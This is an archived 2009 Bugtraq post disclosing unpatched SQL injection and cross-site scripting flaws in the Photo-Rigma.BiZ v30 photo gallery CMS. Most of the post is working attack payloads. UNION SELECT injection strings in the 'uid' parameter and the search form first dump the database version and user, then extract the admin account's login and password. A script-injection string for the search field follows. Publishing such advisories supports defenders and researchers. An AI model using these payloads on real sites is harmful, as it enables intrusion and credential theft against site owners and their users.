| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 24 Apr 2009 09:30:25 -0600
From: y3nh4ck3r@...il.com
To: bugtraq@...urityfocus.com
Subject: REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->
------------------------------------------------------------------
REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->
------------------------------------------------------------------
CMS INFORMATION:
-->WEB: http://foto.rigma.biz (affected)
-->DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/
-->DEMO: http://foto.rigma.biz
-->CATEGORY: CMS / Portals
-->DESCRIPTION: Photo gallery open source project.
-->RELEASED: 2009-04-24
CMS VULNERABILITY:
-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION (SQLi) / XSS
-->AFFECT VERSION: V30
-->Discovered Bug date: 2009-04-24
-->Reported Bug date: 2009-04-24
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
||||||||||||||||||||||||
||||||||||||||||||||||||
----|||| ||||----
----|||| SQL INJECTION ||||----
----|||| ||||----
||||||||||||||||||||||||
||||||||||||||||||||||||
<<<<<<<<บบบบบบบบบบบบบบ----------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~----------บบบบบบบบบบบบบบบ>>>>>>>>
CONDITION: magic_quotes_gpc=off
<<<<<<<<บบบบบบบบบบบบบ---------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~------------บบบบบบบบบบบบบบบ>>>>>>>>
#######################
#######################
## PROOF OF CONCEPT: ##
#######################
#######################
1.- Get var ::::: "uid":
http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
2.- Search Post Form ::::: "poisk":
%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
~~~~~---->>Return: version and database.
###############
###############
## EXPLOIT: ##
###############
###############
1.-
http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*
2.-
%' AND 0 UNION ALL SELECT 1,2,3,concat(login,'<<::>>',password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 FROM user WHERE id=1#
~~~~~---->>Return: login and password for user id one (admin).
||||||||||||||||||||||||
||||||||||||||||||||||||
----|||| ||||----
----|||| XSS (SEARCH) ||||----
----|||| ||||----
||||||||||||||||||||||||
||||||||||||||||||||||||
Search Post Form --> "><script>alert('y3nh4ck3r was here!')</script>
#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL GREETZ TO: Str0ke, JosS, etc ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3R COMMUNITY ##
##*******************************************************************##
#######################################################################
#######################################################################
Powered by blists - more mailing lists